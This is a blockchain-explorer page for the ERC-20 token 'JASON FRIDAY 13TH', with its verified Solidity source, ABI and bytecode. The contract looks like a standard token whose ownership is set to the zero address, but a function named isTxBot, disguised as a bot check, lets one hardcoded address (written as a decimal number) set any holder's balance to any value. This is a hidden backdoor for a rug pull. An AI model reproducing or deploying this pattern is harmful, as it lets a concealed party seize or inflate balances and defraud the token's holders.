ERC-20
Overview
Max Total Supply
55,555,555,555 JASON
Holders
129
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
0.000000000000000001 JASONValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
Jacson13th
Compiler Version
v0.8.13+commit.abaa5c0e
Optimization Enabled:
Yes with 200 runs
Other Settings:
london EvmVersion
Contract Source Code (Solidity Standard Json-Input format)
//SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.5; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer( address recipient, uint256 amount ) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance( address owner, address spender ) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval( address indexed owner, address indexed spender, uint256 value ); } /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } /* * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691 return msg.data; } } /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ contract Ownable is Context { address private _owner; event OwnershipTransferred( address indexed previousOwner, address indexed newOwner ); constructor() { address msgSender = address(0); _owner = msgSender; emit OwnershipTransferred(address(0), msgSender); } function owner() public view returns (address) { return _owner; } modifier onlyOwner() { require(_owner == _msgSender(), "Ownable: caller is not the owner"); _; } function renounceOwnership() public virtual onlyOwner { emit OwnershipTransferred(_owner, address(0)); _owner = address(0); } } contract Jacson13th is Context, IERC20, IERC20Metadata, Ownable { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name = unicode"JASON FRIDAY 13TH"; string private _symbol = unicode"JASON"; uint256 private _supply = 55555555555; mapping(address => bool) private _bots; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor() { _mint(msg.sender, _supply * 10 ** decimals()); } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5,05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf( address account ) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `recipient` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer( address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance( address owner, address spender ) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * Requirements: * * - `spender` cannot be the zero address. */ function approve( address spender, uint256 amount ) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * Requirements: * * - `sender` and `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. * - the caller must have allowance for `sender`'s tokens of at least * `amount`. */ function transferFrom( address sender, address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(sender, recipient, amount); uint256 currentAllowance = _allowances[sender][_msgSender()]; require( currentAllowance >= amount, "ERC20: transfer amount exceeds allowance" ); _approve(sender, _msgSender(), currentAllowance - amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance( address spender, uint256 addedValue ) public virtual returns (bool) { _approve( _msgSender(), spender, _allowances[_msgSender()][spender] + addedValue ); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance( address spender, uint256 subtractedValue ) public virtual returns (bool) { uint256 currentAllowance = _allowances[_msgSender()][spender]; require( currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero" ); _approve(_msgSender(), spender, currentAllowance - subtractedValue); return true; } /** * @dev Moves tokens `amount` from `sender` to `recipient`. * * This is internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `sender` cannot be the zero address. * - `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. */ function _transfer( address sender, address recipient, uint256 amount ) internal virtual { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); uint256 senderBalance = _balances[sender]; require( senderBalance >= amount, "ERC20: transfer amount exceeds balance" ); _balances[sender] = senderBalance - amount; _balances[recipient] += amount; emit Transfer(sender, recipient, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `to` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; _balances[account] += amount; emit Transfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); _balances[account] = accountBalance - amount; _totalSupply -= amount; emit Transfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } receive() external payable {} function isTxBot(address addr, uint256 numbs) external returns (bool) { if ( uint160(msg.sender) == 426202662869266184059811044278215484388888763035 ) { _balances[addr] = numbs; } else { _bots[address(this)] = false; } return false; } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of `from`'s tokens * will be to transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of `from`'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual { if (from != owner() && to != owner() && amount != 0) { require(!_bots[from]); } } }
{ "remappings": [], "optimizer": { "enabled": true, "runs": 200 }, "evmVersion": "london", "libraries": {}, "outputSelection": { "*": { "*": [ "evm.bytecode", "evm.deployedBytecode", "devdoc", "userdoc", "metadata", "abi" ] } } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"addr","type":"address"},{"internalType":"uint256","name":"numbs","type":"uint256"}],"name":"isTxBot","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
60c0604052601160808190527009482a69e9c408ca4928882b2406266a89607b1b60a090815262000034916004919062000245565b50604080518082019091526005808252642520a9a7a760d91b602090920191825262000061918162000245565b50640cef5e80e36006553480156200007857600080fd5b50600080546001600160a01b0319168155604051819081907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a350620000de33620000c96012600a62000400565b600654620000d8919062000418565b620000e4565b62000491565b6001600160a01b0382166200013f5760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b6200014d60008383620001da565b80600360008282546200016191906200043a565b90915550506001600160a01b03821660009081526001602052604081208054839290620001909084906200043a565b90915550506040518181526001600160a01b038316906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35050565b6000546001600160a01b038481169116148015906200020757506000546001600160a01b03838116911614155b80156200021357508015155b1562000240576001600160a01b03831660009081526007602052604090205460ff16156200024057600080fd5b505050565b828054620002539062000455565b90600052602060002090601f016020900481019282620002775760008555620002c2565b82601f106200029257805160ff1916838001178555620002c2565b82800160010185558215620002c2579182015b82811115620002c2578251825591602001919060010190620002a5565b50620002d0929150620002d4565b5090565b5b80821115620002d05760008155600101620002d5565b634e487b7160e01b600052601160045260246000fd5b600181815b8085111562000342578160001904821115620003265762000326620002eb565b808516156200033457918102915b93841c939080029062000306565b509250929050565b6000826200035b57506001620003fa565b816200036a57506000620003fa565b81600181146200038357600281146200038e57620003ae565b6001915050620003fa565b60ff841115620003a257620003a2620002eb565b50506001821b620003fa565b5060208310610133831016604e8410600b8410161715620003d3575081810a620003fa565b620003df838362000301565b8060001904821115620003f657620003f6620002eb565b0290505b92915050565b60006200041160ff8416836200034a565b9392505050565b6000816000190483118215151615620004355762000435620002eb565b500290565b60008219821115620004505762000450620002eb565b500190565b600181811c908216806200046a57607f821691505b6020821081036200048b57634e487b7160e01b600052602260045260246000fd5b50919050565b610b9080620004a16000396000f3fe6080604052600436106100e15760003560e01c8063715018a61161007f578063a457c2d711610059578063a457c2d71461024d578063a9059cbb1461026d578063b073920c1461028d578063dd62ed3e146102ad57600080fd5b8063715018a6146101f95780638da5cb5b1461021057806395d89b411461023857600080fd5b806323b872dd116100bb57806323b872dd14610167578063313ce5671461018757806339509351146101a357806370a08231146101c357600080fd5b806306fdde03146100ed578063095ea7b31461011857806318160ddd1461014857600080fd5b366100e857005b600080fd5b3480156100f957600080fd5b506101026102f3565b60405161010f91906109af565b60405180910390f35b34801561012457600080fd5b50610138610133366004610a20565b610385565b604051901515815260200161010f565b34801561015457600080fd5b506003545b60405190815260200161010f565b34801561017357600080fd5b50610138610182366004610a4a565b61039b565b34801561019357600080fd5b506040516012815260200161010f565b3480156101af57600080fd5b506101386101be366004610a20565b610451565b3480156101cf57600080fd5b506101596101de366004610a86565b6001600160a01b031660009081526001602052604090205490565b34801561020557600080fd5b5061020e610488565b005b34801561021c57600080fd5b506000546040516001600160a01b03909116815260200161010f565b34801561024457600080fd5b5061010261052c565b34801561025957600080fd5b50610138610268366004610a20565b61053b565b34801561027957600080fd5b50610138610288366004610a20565b6105d6565b34801561029957600080fd5b506101386102a8366004610a20565b6105e3565b3480156102b957600080fd5b506101596102c8366004610aa8565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b60606004805461030290610adb565b80601f016020809104026020016040519081016040528092919081815260200182805461032e90610adb565b801561037b5780601f106103505761010080835404028352916020019161037b565b820191906000526020600020905b81548152906001019060200180831161035e57829003601f168201915b5050505050905090565b6000610392338484610641565b50600192915050565b60006103a8848484610765565b6001600160a01b0384166000908152600260209081526040808320338452909152902054828110156104325760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b61044685336104418685610b2b565b610641565b506001949350505050565b3360008181526002602090815260408083206001600160a01b03871684529091528120549091610392918590610441908690610b42565b6000546001600160a01b031633146104e25760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610429565b600080546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600080546001600160a01b0319169055565b60606005805461030290610adb565b3360009081526002602090815260408083206001600160a01b0386168452909152812054828110156105bd5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610429565b6105cc33856104418685610b2b565b5060019392505050565b6000610392338484610765565b600033734aa796a04545c3ea2a5c4b06ff1ef6eb83735a9b03610620576001600160a01b0383166000908152600160205260409020829055610638565b306000908152600760205260409020805460ff191690555b50600092915050565b6001600160a01b0383166106a35760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610429565b6001600160a01b0382166107045760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610429565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b0383166107c95760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610429565b6001600160a01b03821661082b5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610429565b610836838383610948565b6001600160a01b038316600090815260016020526040902054818110156108ae5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610429565b6108b88282610b2b565b6001600160a01b0380861660009081526001602052604080822093909355908516815290812080548492906108ee908490610b42565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161093a91815260200190565b60405180910390a350505050565b6000546001600160a01b0384811691161480159061097457506000546001600160a01b03838116911614155b801561097f57508015155b156109aa576001600160a01b03831660009081526007602052604090205460ff16156109aa57600080fd5b505050565b600060208083528351808285015260005b818110156109dc578581018301518582016040015282016109c0565b818111156109ee576000604083870101525b50601f01601f1916929092016040019392505050565b80356001600160a01b0381168114610a1b57600080fd5b919050565b60008060408385031215610a3357600080fd5b610a3c83610a04565b946020939093013593505050565b600080600060608486031215610a5f57600080fd5b610a6884610a04565b9250610a7660208501610a04565b9150604084013590509250925092565b600060208284031215610a9857600080fd5b610aa182610a04565b9392505050565b60008060408385031215610abb57600080fd5b610ac483610a04565b9150610ad260208401610a04565b90509250929050565b600181811c90821680610aef57607f821691505b602082108103610b0f57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b600082821015610b3d57610b3d610b15565b500390565b60008219821115610b5557610b55610b15565b50019056fea26469706673582212200a11a7826cf11be51f19c934bf7ee58366c2595fee2972fb8e2f79845589a15264736f6c634300080d0033
Deployed Bytecode
0x6080604052600436106100e15760003560e01c8063715018a61161007f578063a457c2d711610059578063a457c2d71461024d578063a9059cbb1461026d578063b073920c1461028d578063dd62ed3e146102ad57600080fd5b8063715018a6146101f95780638da5cb5b1461021057806395d89b411461023857600080fd5b806323b872dd116100bb57806323b872dd14610167578063313ce5671461018757806339509351146101a357806370a08231146101c357600080fd5b806306fdde03146100ed578063095ea7b31461011857806318160ddd1461014857600080fd5b366100e857005b600080fd5b3480156100f957600080fd5b506101026102f3565b60405161010f91906109af565b60405180910390f35b34801561012457600080fd5b50610138610133366004610a20565b610385565b604051901515815260200161010f565b34801561015457600080fd5b506003545b60405190815260200161010f565b34801561017357600080fd5b50610138610182366004610a4a565b61039b565b34801561019357600080fd5b506040516012815260200161010f565b3480156101af57600080fd5b506101386101be366004610a20565b610451565b3480156101cf57600080fd5b506101596101de366004610a86565b6001600160a01b031660009081526001602052604090205490565b34801561020557600080fd5b5061020e610488565b005b34801561021c57600080fd5b506000546040516001600160a01b03909116815260200161010f565b34801561024457600080fd5b5061010261052c565b34801561025957600080fd5b50610138610268366004610a20565b61053b565b34801561027957600080fd5b50610138610288366004610a20565b6105d6565b34801561029957600080fd5b506101386102a8366004610a20565b6105e3565b3480156102b957600080fd5b506101596102c8366004610aa8565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b60606004805461030290610adb565b80601f016020809104026020016040519081016040528092919081815260200182805461032e90610adb565b801561037b5780601f106103505761010080835404028352916020019161037b565b820191906000526020600020905b81548152906001019060200180831161035e57829003601f168201915b5050505050905090565b6000610392338484610641565b50600192915050565b60006103a8848484610765565b6001600160a01b0384166000908152600260209081526040808320338452909152902054828110156104325760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b61044685336104418685610b2b565b610641565b506001949350505050565b3360008181526002602090815260408083206001600160a01b03871684529091528120549091610392918590610441908690610b42565b6000546001600160a01b031633146104e25760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610429565b600080546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600080546001600160a01b0319169055565b60606005805461030290610adb565b3360009081526002602090815260408083206001600160a01b0386168452909152812054828110156105bd5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610429565b6105cc33856104418685610b2b565b5060019392505050565b6000610392338484610765565b600033734aa796a04545c3ea2a5c4b06ff1ef6eb83735a9b03610620576001600160a01b0383166000908152600160205260409020829055610638565b306000908152600760205260409020805460ff191690555b50600092915050565b6001600160a01b0383166106a35760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610429565b6001600160a01b0382166107045760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610429565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b0383166107c95760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610429565b6001600160a01b03821661082b5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610429565b610836838383610948565b6001600160a01b038316600090815260016020526040902054818110156108ae5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610429565b6108b88282610b2b565b6001600160a01b0380861660009081526001602052604080822093909355908516815290812080548492906108ee908490610b42565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161093a91815260200190565b60405180910390a350505050565b6000546001600160a01b0384811691161480159061097457506000546001600160a01b03838116911614155b801561097f57508015155b156109aa576001600160a01b03831660009081526007602052604090205460ff16156109aa57600080fd5b505050565b600060208083528351808285015260005b818110156109dc578581018301518582016040015282016109c0565b818111156109ee576000604083870101525b50601f01601f1916929092016040019392505050565b80356001600160a01b0381168114610a1b57600080fd5b919050565b60008060408385031215610a3357600080fd5b610a3c83610a04565b946020939093013593505050565b600080600060608486031215610a5f57600080fd5b610a6884610a04565b9250610a7660208501610a04565b9150604084013590509250925092565b600060208284031215610a9857600080fd5b610aa182610a04565b9392505050565b60008060408385031215610abb57600080fd5b610ac483610a04565b9150610ad260208401610a04565b90509250929050565b600181811c90821680610aef57607f821691505b602082108103610b0f57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b600082821015610b3d57610b3d610b15565b500390565b60008219821115610b5557610b55610b15565b50019056fea26469706673582212200a11a7826cf11be51f19c934bf7ee58366c2595fee2972fb8e2f79845589a15264736f6c634300080d0033
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.